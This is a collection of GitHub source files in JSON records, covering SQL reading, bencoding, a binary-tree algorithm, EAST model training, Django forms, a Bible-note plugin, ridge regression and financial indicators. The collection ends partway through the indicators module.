+{"seq_id": "28973881098", "text": "#readFromSql.py\nimport pandas as pd\nimport sqlalchemy as alc\nimport urllib\n\ndef getFromSql (tableName):\n params = urllib.parse.quote_plus(\n 'DRIVER={SQL Server};'+\n 'SERVER=DESKTOP-SQU7IEK;'+\n 'DATABASE=pfizer;'+\n 'Trusted_Connection=yes'\n )\n engine = alc.create_engine(\"mssql+pyodbc:///?odbc_connect=%s\" % params)\n\n df = pd.read_sql(tableName, con=engine)\n return df\n\n \n\n ", "repo_name": "PerlantidisStefanos/simple_flask_communication", "sub_path": "readFromSql.py", "file_name": "readFromSql.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.parse.quote_plus", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sqlalchemy.create_engine", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "19175112182", "text": "import typing\nfrom lbry.dht.error import DecodeError\n\n\ndef _bencode(data: typing.Union[int, bytes, bytearray, str, list, tuple, dict]) -> bytes:\n if isinstance(data, int):\n return b'i%de' % data\n elif isinstance(data, (bytes, bytearray)):\n return b'%d:%s' % (len(data), data)\n elif isinstance(data, str):\n return b'%d:%s' % (len(data), data.encode())\n elif isinstance(data, (list, tuple)):\n encoded_list_items = b''\n for item in data:\n encoded_list_items += _bencode(item)\n return b'l%se' % encoded_list_items\n elif isinstance(data, dict):\n encoded_dict_items = b''\n keys = data.keys()\n for key in sorted(keys):\n encoded_dict_items += _bencode(key)\n encoded_dict_items += _bencode(data[key])\n return b'd%se' % encoded_dict_items\n else:\n raise TypeError(f\"Cannot bencode {type(data)}\")\n\n\ndef _bdecode(data: bytes, start_index: int = 0) -> typing.Tuple[typing.Union[int, bytes, list, tuple, dict], int]:\n if data[start_index] == ord('i'):\n end_pos = data[start_index:].find(b'e') + start_index\n return int(data[start_index + 1:end_pos]), end_pos + 1\n elif data[start_index] == ord('l'):\n start_index += 1\n decoded_list = []\n while data[start_index] != ord('e'):\n list_data, start_index = _bdecode(data, start_index)\n decoded_list.append(list_data)\n return decoded_list, start_index + 1\n elif data[start_index] == ord('d'):\n start_index += 1\n decoded_dict = {}\n while data[start_index] != ord('e'):\n key, start_index = _bdecode(data, start_index)\n value, start_index = _bdecode(data, start_index)\n decoded_dict[key] = value\n return decoded_dict, start_index\n else:\n split_pos = data[start_index:].find(b':') + start_index\n try:\n length = int(data[start_index:split_pos])\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n start_index = split_pos + 1\n end_pos = start_index + length\n return data[start_index:end_pos], end_pos\n\n\ndef bencode(data: typing.Dict) -> bytes:\n if not isinstance(data, dict):\n raise TypeError()\n return _bencode(data)\n\n\ndef bdecode(data: bytes, allow_non_dict_return: typing.Optional[bool] = False) -> typing.Dict:\n assert isinstance(data, bytes), DecodeError(f\"invalid data type: {str(type(data))}\")\n\n if len(data) == 0:\n raise DecodeError('Cannot decode empty string')\n try:\n result = _bdecode(data)[0]\n if not allow_non_dict_return and not isinstance(result, dict):\n raise ValueError(f'expected dict, got {type(result)}')\n return result\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n", "repo_name": "lbryio/lbry-sdk", "sub_path": "lbry/dht/serialization/bencoding.py", "file_name": "bencoding.py", "file_ext": "py", "file_size_in_byte": 2839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7218, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Union", "line_number": 5, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 64, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 65, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 68, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 75, "usage_type": 
"call"}, {"api_name": "typing.Dict", "line_number": 64, "usage_type": "attribute"}]}
+{"seq_id": "21757375059", "text": "# -*- coding:utf-8 -*-\n# author: hpf\n# create time: 2020/10/22 9:38\n# file: 111_二叉树的最小深度.py\n# IDE: PyCharm\n\n# 题目描述:\n# 给定一个二叉树,找出其最小深度。\n#\n# 最小深度是从根节点到最近叶子节点的最短路径上的节点数量。\n#\n# 说明: 叶子节点是指没有子节点的节点。\n#\n# 示例:\n#\n# 给定二叉树 [3,9,20,null,null,15,7],\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# 返回它的最小深度 2.\n\n# 解法一: BFS\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution1:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n\n from collections import deque\n q = deque()\n\n # root本身就是一层,depth初始化为1\n q.append(root)\n depth = 1\n\n while(q):\n size = len(q)\n # 将当前队列中的所有节点向四周扩散\n for _ in range(size):\n node = q.popleft()\n # 判断是否到达终点\n if not node.left and not node.right:\n return depth\n # 将node的相邻节点��入队列\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # 这里增加步数\n depth += 1\n\n return depth\n\n# 解法二: DFS\n\n# 先看使用 DFS(深度优先搜索)的方法,具体做法如下:\n#\n# 根节点为空,返回 0;\n# 如果根节点不为空,需要判断左右子节点:\n# 左右子节点都为空,那么返回 1;\n# 左右子节点其中一个为空,那么返回不为空子节点的最小深度;\n# 左右子节点均不为空,返回其中较小深度的值。\n\n\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n # 根节点为空\n if not root:\n return 0\n # 根节点不为空,但不存在左右子节点,返回 1\n if not root.left and not root.right:\n return 1\n\n depth = 1\n\n # 返回不为空的右子节点最小深度\n if not root.left:\n depth += self.minDepth(root.right)\n # 不存在右子节点,返回不为空的左子节点最小深度\n elif not root.right:\n depth += self.minDepth(root.left)\n # 左右子节点均不为空,返回较小深度\n else:\n left_depth = self.minDepth(root.left)\n right_depth = self.minDepth(root.right)\n depth += min(left_depth, right_depth)\n\n return depth", "repo_name": "hpf0532/algorithms_demo", "sub_path": "leetcode/111_二叉树的最小深度.py", "file_name": "111_二叉树的最小深度.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "14474576552", "text": "# coding=utf-8\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nimport gluoncv as gcv\nfrom model_zoo import east, EASTLoss, east_fpn\nfrom data.ic_data import text_detection_data\nfrom mxnet.gluon.data import DataLoader\nfrom mxnet.gluon import utils\nimport logging\nimport os, sys\nfrom mxboard import SummaryWriter\nimport numpy as np\nfrom mxnet import lr_scheduler as ls\n\nlogging.basicConfig(level=logging.INFO)\n\ndef main(train_dir, ctx=None, lr=0.0001, epoches=20, batch_size=16, checkpoint_path='model', debug=False):\n summ_writer = SummaryWriter(checkpoint_path)\n # dataloader\n ctx = eval(ctx)\n context = mx.gpu(ctx) if ctx > 0 else mx.cpu()\n ic_data = text_detection_data(image_dir=train_dir)\n ic_dataloader = DataLoader(dataset=ic_data, batch_size=batch_size, shuffle=True, num_workers=16)\n data_num = len(ic_dataloader) * batch_size\n # model\n east_model = east.EAST(nclass=2, text_scale=1024)\n # east_model = east(text_scale=1024)\n\n east_model.collect_params().initialize(init=mx.init.Xavier(), verbose=True, ctx=context)\n if not debug:\n east_model.hybridize()\n cos_shc = ls.PolyScheduler(max_update=ic_dataloader.length * epoches//batch_size, base_lr=lr)\n\n trainer = gluon.Trainer(east_model.collect_params(),\n 'sgd',\n {'learning_rate': lr,\n 'wd': 1e-5,\n 'momentum': 0.9,\n 'clip_gradient': 5,\n 'lr_scheduler':cos_shc}\n )\n EAST_loss = EASTLoss(cls_weight=0.01, iou_weight=1.0, angle_weight=20)\n step = 0\n lr_counter = 0\n lr_steps = [5, 10, 15, 20]\n lr_factor = 0.9\n\n for epoch in range(epoches):\n loss = []\n if epoch == lr_steps[lr_counter]:\n trainer.set_learning_rate(trainer.learning_rate*lr_factor)\n lr_counter += 1\n for i, batch_data in enumerate(ic_dataloader):\n im, score_map, geo_map, training_mask = map(lambda x: x.as_in_context(ctx), batch_data)\n\n with autograd.record(train_mode=True):\n\n f_score, f_geo = east_model(im)\n batch_loss = EAST_loss(score_map, f_score, geo_map, f_geo, training_mask)\n loss.append(batch_loss)\n batch_loss.backward()\n\n trainer.step(batch_size)\n # if i % 2 == 0:\n step = epoch * data_num + i * batch_size\n model_loss = np.mean(map(lambda x: x.asnumpy()[0], loss))\n summ_writer.add_scalar('model_loss', model_loss[0])\n logging.info(\"step: {}, loss: {}\".format(step, batch_loss.asnumpy()))\n ckpt_file = os.path.join(checkpoint_path, \"model_{}.params\".format(step))\n east_model.save_parameters(ckpt_file)\n logging.info(\"save model to {}\".format(ckpt_file))\n\nif __name__ == '__main__':\n train_dir = sys.argv[1]\n ckpt_path = sys.argv[2]\n ctxes = sys.argv[3]\n main(train_dir=train_dir, ctx=ctxes, checkpoint_path=ckpt_path, debug=True)\n", "repo_name": "saicoco/Gluon-EAST", "sub_path": "scripts/train_east.py", "file_name": "train_east.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mxboard.SummaryWriter", "line_number": 18, "usage_type": "call"}, {"api_name": "mxnet.gpu", "line_number": 21, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 21, "usage_type": "call"}, {"api_name": "data.ic_data.text_detection_data", "line_number": 22, "usage_type": "call"}, {"api_name": "mxnet.gluon.data.DataLoader", "line_number": 23, "usage_type": "call"}, {"api_name": "model_zoo.east.EAST", 
"line_number": 26, "usage_type": "call"}, {"api_name": "model_zoo.east", "line_number": 26, "usage_type": "name"}, {"api_name": "mxnet.init.Xavier", "line_number": 29, "usage_type": "call"}, {"api_name": "mxnet.init", "line_number": 29, "usage_type": "attribute"}, {"api_name": "mxnet.lr_scheduler.PolyScheduler", "line_number": 32, "usage_type": "call"}, {"api_name": "mxnet.lr_scheduler", "line_number": 32, "usage_type": "name"}, {"api_name": "mxnet.gluon.Trainer", "line_number": 34, "usage_type": "call"}, {"api_name": "mxnet.gluon", "line_number": 34, "usage_type": "name"}, {"api_name": "model_zoo.EASTLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "mxnet.autograd.record", "line_number": 56, "usage_type": "call"}, {"api_name": "mxnet.autograd", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}]}
+{"seq_id": "70183338728", "text": "from django import forms\nfrom .models import *\n\n\nclass BackupSearch(forms.Form):\n start_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n end_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n name = forms.CharField(required=False, widget=forms.DateInput(attrs={'class': 'width-100',\n 'required': False}))\n\n\nclass UploadBackupForm(forms.Form):\n # allow .zip files only\n file = forms.FileField(required=True, widget=forms.FileInput(attrs={'id': 'backup_field', 'accept': '.zip'}))\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['body']\n widgets = {\n 'body': forms.Textarea(attrs={'rows': 1, 'cols': 115, 'placeholder': 'Add a comment...'})\n }\n labels = {k: \"\" for k in fields}\n", "repo_name": "Fingolfin7/SoftriteAPI", "sub_path": "backups/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms.DateField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.FileInput", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "6404845655", "text": "import config\nfrom util.BibleVerseParser import BibleVerseParser\n\nif config.pluginContext:\n config.mainWindow.showNoteEditor()\n parser = BibleVerseParser(config.parserStandarisation)\n verseList = parser.extractAllReferences(config.pluginContext, False)\n if not verseList:\n config.mainWindow.displayMessage(config.thisTranslation[\"message_noReference\"])\n else:\n content = \"; \".join([parser.bcvToVerseReference(*verse) for verse in verseList])\n\n if hasattr(config.mainWindow, \"noteEditor\"):\n content = \" {0} \".format(content)\n if config.mainWindow.noteEditor.noteEditor.html:\n config.mainWindow.noteEditor.noteEditor.editor.insertHtml(content)\n else:\n config.mainWindow.noteEditor.noteEditor.editor.insertPlainText(content)\n else:\n config.contextItem = content\n config.mainWindow.createNewNoteFile()\nelse:\n config.contextSource.messageNoSelection()\n", "repo_name": "eliranwong/UniqueBible", "sub_path": "plugins/context/Insert References into Note Editor.py", "file_name": "Insert References into Note Editor.py", "file_ext": "py", "file_size_in_byte": 992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 104, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.pluginContext", "line_number": 4, "usage_type": "attribute"}, {"api_name": "config.mainWindow.showNoteEditor", "line_number": 5, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 5, "usage_type": "attribute"}, {"api_name": "util.BibleVerseParser.BibleVerseParser", "line_number": 6, "usage_type": "call"}, {"api_name": "config.parserStandarisation", "line_number": 6, "usage_type": "attribute"}, {"api_name": "config.pluginContext", "line_number": 7, "usage_type": "attribute"}, {"api_name": "config.mainWindow.displayMessage", "line_number": 9, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.thisTranslation", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 15, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertHtml", "line_number": 16, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 16, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertPlainText", "line_number": 18, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 18, "usage_type": "attribute"}, {"api_name": "config.contextItem", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.mainWindow.createNewNoteFile", "line_number": 21, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.contextSource.messageNoSelection", "line_number": 23, "usage_type": "call"}, {"api_name": "config.contextSource", "line_number": 23, "usage_type": "attribute"}]}
+{"seq_id": "72894779048", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sklearn import linear_model\n\n\nclass Regression:\n def __init__(self, lamb, m=1):\n self.lamb = lamb\n self.w = None\n self.M = m\n\n def fonction_base_polynomiale(self, x):\n \"\"\"\n Fonction de base qui projette la donnee x vers un espace polynomial tel que mentionne au chapitre 3.\n Si x est un scalaire, alors phi_x sera un vecteur à self.M dimensions : (x^1,x^2,...,x^self.M)\n Si x est un vecteur de N scalaires, alors phi_x sera un tableau 2D de taille NxM\n\n NOTE : En mettant phi_x = x, on a une fonction de base lineaire qui fonctionne pour une regression lineaire\n \"\"\"\n\n if np.isscalar(x):\n return x ** np.arange(self.M+1)\n\n return x[:, None] ** np.arange(self.M+1)\n\n def recherche_hyperparametre(self, X, t):\n \"\"\"\n Validation croisee de type \"k-fold\" pour k=10 utilisee pour trouver la meilleure valeur pour\n l'hyper-parametre self.M.\n\n Le resultat est mis dans la variable self.M\n\n X: vecteur de donnees\n t: vecteur de cibles\n \"\"\"\n # AJOUTER CODE ICI\n M_min = 1\n M_max = 201\n lamb_min = 0.0001\n lamb_max = 1\n lambs = list(np.geomspace(lamb_min, lamb_max, num=20))\n k = 10\n\n\n # Liste des items\n liste_indices = np.arange(len(X), dtype=np.int)\n # Pas nécéssaire de shuffle ?\n np.random.shuffle(liste_indices)\n\n # Split les indices en k \"chunks\"\n folds = np.array_split(liste_indices, 10)\n\n best_mean_error = np.inf\n\n for M in range(M_min, M_max):\n self.M = M\n\n for lamb in lambs:\n self.lamb = lamb\n\n erreur = np.zeros(k)\n for j in range(k):\n # Le chunk d'indices est celui de validation\n valid_indices = folds[j]\n # Les autres chunks serviront à l'entrainement\n train_indices = np.concatenate([f for i, f in enumerate(folds) if i != j])\n\n # Sélection des données\n x_valid = X[liste_indices[valid_indices]]\n t_valid = t[liste_indices[valid_indices]]\n x_train = X[liste_indices[train_indices]]\n t_train = t[liste_indices[train_indices]]\n\n # Entrainement et calcul d'erreur\n self.entrainement(x_train, t_train)\n pred_valid = np.array([self.prediction(x) for x in x_valid])\n erreur[j] = np.sum(self.erreur(t_valid, pred_valid))\n\n mean_error = np.mean(erreur)\n if mean_error <= best_mean_error:\n best_mean_error = mean_error\n best_M = M\n best_lamb = lamb\n\n self.M = best_M\n self.lamb = best_lamb\n print('M trouvé: {}'.format(self.M))\n print('lamb trouvé: {}'.format(self.lamb))\n\n def entrainement(self, X, t, using_sklearn=False):\n \"\"\"\n Entraîne la regression lineaire sur l'ensemble d'entraînement forme des\n entrees ``X`` (un tableau 2D Numpy, ou la n-ieme rangee correspond à l'entree\n x_n) et des cibles ``t`` (un tableau 1D Numpy ou le\n n-ieme element correspond à la cible t_n). L'entraînement doit\n utiliser le poids de regularisation specifie par ``self.lamb``.\n\n Cette methode doit assigner le champs ``self.w`` au vecteur\n (tableau Numpy 1D) de taille D+1, tel que specifie à la section 3.1.4\n du livre de Bishop.\n\n Lorsque using_sklearn=True, vous devez utiliser la classe \"Ridge\" de\n la librairie sklearn (voir http://scikit-learn.org/stable/modules/linear_model.html)\n\n Lorsque using_sklearn=Fasle, vous devez implementer l'equation 3.28 du\n livre de Bishop. 
Il est suggere que le calcul de ``self.w`` n'utilise\n pas d'inversion de matrice, mais utilise plutôt une procedure\n de resolution de systeme d'equations lineaires (voir np.linalg.solve).\n\n Aussi, la variable membre self.M sert à projeter les variables X vers un espace polynomiale de degre M\n (voir fonction self.fonction_base_polynomiale())\n\n NOTE IMPORTANTE : lorsque self.M <= 0, il faut trouver la bonne valeur de self.M\n\n \"\"\"\n\n # AJOUTER CODE ICI\n if self.M <= 0:\n self.recherche_hyperparametre(X, t)\n\n phi_X = self.fonction_base_polynomiale(X)\n\n if using_sklearn:\n reg = linear_model.Ridge(alpha=self.lamb, fit_intercept=False)\n reg.fit(phi_X, t)\n self.w = reg.coef_\n else:\n mat = self.lamb*np.identity(self.M+1) + np.dot(phi_X.T, phi_X)\n vec = np.dot(phi_X.T, t)\n self.w = np.linalg.solve(mat, vec)\n\n def prediction(self, x):\n \"\"\"\n Retourne la prediction de la regression lineaire\n pour une entree, representee par un tableau 1D Numpy ``x``.\n\n Cette methode suppose que la methode ``entrainement()``\n a prealablement ete appelee. Elle doit utiliser le champs ``self.w``\n afin de calculer la prediction y(x,w) (equation 3.1 et 3.3).\n \"\"\"\n # AJOUTER CODE ICI\n return np.dot(self.fonction_base_polynomiale(x), self.w)\n\n @staticmethod\n def erreur(t, prediction):\n \"\"\"\n Retourne l'erreur de la difference au carre entre\n la cible ``t`` et la prediction ``prediction``.\n \"\"\"\n # AJOUTER CODE ICI\n return (t-prediction)**2\n", "repo_name": "AntoineTheb/ift888", "sub_path": "Q1-pt2/solution_regression.py", "file_name": "solution_regression.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.isscalar", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.geomspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array_split", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.identity", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 143, "usage_type": "call"}]}
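The entrainement() method in the record above implements Bishop's equation 3.28 with np.linalg.solve rather than an explicit matrix inverse. Here is a self-contained sketch of that closed-form ridge solution on synthetic data; the sine target, seed, and hyperparameter values are illustrative, not taken from the repository.

import numpy as np

# Ridge solution w = (lambda*I + Phi^T Phi)^-1 Phi^T t (Bishop eq. 3.28),
# computed by solving the linear system instead of inverting the matrix.
rng = np.random.default_rng(0)
x = rng.uniform(-1, 1, size=50)
t = np.sin(2 * np.pi * x) + rng.normal(0, 0.1, size=50)

M, lamb = 5, 0.01
phi = x[:, None] ** np.arange(M + 1)        # polynomial basis, shape (N, M+1)
A = lamb * np.identity(M + 1) + phi.T @ phi
w = np.linalg.solve(A, phi.T @ t)
prediction = phi @ w                        # fitted values on the training inputs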
+{"seq_id": "69930025127", "text": "import pandas as pd\nfrom parse import parse\nfrom stockstats import StockDataFrame as Sdf\nfrom finta import TA\nimport ta\nfrom collections import OrderedDict\nimport numpy as np\nfrom . import indicators_vsa as vsa\nfrom . import indicators_flabeling as flabeling\nfrom . import indicators_supertrend as supertrend\nfrom . import indicators_tradingview as tv\nfrom . import utils\n\ndef get_window_size(indicator):\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n\n if indicator in [\"open\", \"close\", \"high\", \"low\"]:\n return 1\n\n elif trend_parsed != None and trend_parsed[0].isdigit():\n return int(trend_parsed[0])\n\n elif sma_parsed != None and sma_parsed[0].isdigit():\n return int(sma_parsed[0])\n\n elif ema_parsed != None and ema_parsed[0].isdigit():\n return int(ema_parsed[0])\n\n elif wma_parsed != None and wma_parsed[0].isdigit():\n return int(wma_parsed[0])\n\n elif indicator in ['macd', 'macds', 'macdh']:\n return 26\n\n elif indicator == \"bbands\":\n return 20\n\n elif indicator in [\"rsi_30\", \"cci_30\", \"dx_30\"]:\n return 30\n \n elif indicator == \"rsi\":\n return 14\n\n elif indicator == 'williams_%r':\n return 14\n\n elif indicator in ['stoch_%k', 'stoch_%d']:\n return 14\n \n elif indicator == 'er':\n return 10\n \n elif indicator == 'stc':\n return 50\n \n elif indicator == 'atr':\n return 14\n \n elif indicator == 'adx':\n return 14\n \n elif indicator == 'roc':\n return 12\n\n elif indicator == 'mom':\n return 10\n\n elif indicator == 'simple_rtn':\n return 1\n\n elif indicator == 'labeling':\n return 20\n\n elif indicator.startswith('tv_'):\n return 0\n\n elif indicator.startswith('close_synthetic_'):\n return 0\n\n elif '_shift_' in indicator:\n lst_split = indicator.split(\"_\")\n if len(lst_split) == 3:\n return int(lst_split[2])\n else:\n return 0\n\n elif indicator == 'vsa':\n return 60\n\n elif indicator == \"super_trend_direction\":\n return 15\n\n print(\"unknown window size for \", indicator)\n return 0\n\ndef get_max_window_size(indicators):\n if len(indicators) == 0:\n return 0\n\n if isinstance(indicators, list):\n return max([get_window_size(indicator) for indicator in indicators])\n elif isinstance(indicators, dict):\n # if the parameters of all the indicators are dictionaries...\n #window_sizes = [parameters[\"window_size\"] if \"window_size\" in parameters else get_window_size(indicator) for indicator, parameters in indicators.items()]\n # but just in case there is something else :\n window_sizes = [0]\n for indicator in indicators:\n parameters = indicators[indicator]\n if isinstance(parameters, dict):\n parameters = indicators[indicator]\n if \"window_size\" in parameters:\n window_size = parameters[\"window_size\"]\n if isinstance(window_size, str):\n window_size = int(window_size)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n elif isinstance(parameters, int):\n window_sizes.append(parameters)\n else:\n window_size = get_window_size(indicator)\n window_sizes.append(window_size)\n\n return max(window_sizes)\n\n return 0\n\ndef get_feature_from_fdp_features(fdp_features):\n lst_features = []\n for feature in fdp_features:\n if len(fdp_features[feature]) == 0:\n lst_features.append(feature)\n elif fdp_features[feature] != None:\n lst_param = list(fdp_features[feature])\n if \"id\" in lst_param:\n id = \"_\" + fdp_features[feature][\"id\"]\n 
else:\n id = \"\"\n if \"n\" in lst_param:\n n = \"n\" + fdp_features[feature][\"n\"] + \"_\"\n else:\n n = \"\"\n if not feature.startswith(\"postprocess\"):\n lst_features.append(fdp_features[feature][\"indicator\"] + id)\n if \"output\" in lst_param:\n for output in fdp_features[feature][\"output\"]:\n lst_features.append(output + id)\n if \"indicator\" in fdp_features[feature] \\\n and fdp_features[feature][\"indicator\"] == \"shift\" \\\n and \"input\" in lst_param:\n for input in fdp_features[feature][\"input\"]:\n lst_features.append(n + input + id)\n return lst_features\n\ndef compute_indicators(df, indicators, keep_only_requested_indicators = False, params = None):\n if not isinstance(df, pd.DataFrame):\n return df\n\n # manage indicators as an array but it is converted into a dictionary\n if isinstance(indicators, list):\n indicators = dict.fromkeys(indicators, {})\n\n # call stockstats\n stock = Sdf.retype(df.copy())\n\n if isinstance(indicators, dict):\n keep_indicators = get_feature_from_fdp_features(indicators)\n else:\n keep_indicators = indicators\n\n # compute the indicators\n columns = list(df.columns)\n\n # be sure postprocess are treated at the end\n oindicators = OrderedDict()\n for indicator, parameters in indicators.items():\n if not indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n for indicator, parameters in indicators.items():\n if indicator.startswith(\"postprocess\"):\n oindicators[indicator] = parameters\n \n\n for indicator, parameters in oindicators.items():\n if indicator in columns:\n continue\n \n # check if one deals with a postprocess\n if indicator.startswith(\"postprocess\"):\n if \"input\" in parameters and \"indicator\" in parameters and \"n\" in parameters:\n indicator = parameters[\"indicator\"]\n id = \"\"\n if \"id\" in parameters:\n id = \"_\"+parameters[\"id\"]\n n = parameters[\"n\"]\n if isinstance(n, str):\n n = int(n)\n input = [item+id for item in parameters[\"input\"]]\n if isinstance(input, list):\n if all(item in list(df.columns) for item in input):\n df = utils.get_n_columns(df, input, n)\n\n # check if the indicator is overriden\n if \"indicator\" in parameters:\n indicator = parameters[\"indicator\"]\n\n # prepare the suffix if an id is specified\n suffix = \"\"\n if 'id' in parameters:\n suffix = \"_\"+parameters[\"id\"]\n\n trend_parsed = parse('trend_{}d', indicator)\n sma_parsed = parse('sma_{}', indicator)\n ema_parsed = parse('ema_{}', indicator)\n wma_parsed = parse('wma_{}', indicator)\n slope_parsed = parse('slope_{}', indicator)\n\n if trend_parsed != None and trend_parsed[0].isdigit():\n seq = int(trend_parsed[0])\n diff = df[\"close\"] - df[\"close\"].shift(seq)\n df[\"trend_\"+str(seq)+\"d\"+ suffix] = diff.gt(0).map({False: 0, True: 